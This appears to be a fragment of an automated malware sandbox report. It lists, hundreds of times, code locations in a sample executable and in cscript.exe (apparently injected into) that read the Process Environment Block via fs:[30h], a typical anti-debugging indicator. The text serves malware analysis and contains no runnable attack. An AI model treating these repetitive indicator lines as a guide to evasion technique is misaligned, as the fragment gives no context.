          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B13540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AB7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B60EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B4FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AC8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B51608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AA8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AD37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00A94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ACA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00ABF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00B68F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 1_2_00AAEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04948CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0494740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04872D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_049405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04928DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04948D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048FA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04883D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048B3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04923D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04897D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04940EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04948ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048B8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0492FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04931608 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0487E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0492FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04887E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0493AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04888794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048B37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0494070D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04874F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04948F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04879080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048B90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0490B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048740E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048758EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04944015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0488B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04890050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04932073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_04941074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_0489C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\cscript.exe Code function: 18_2_048F51BE mov eax, dword ptr fs:[00000030h]
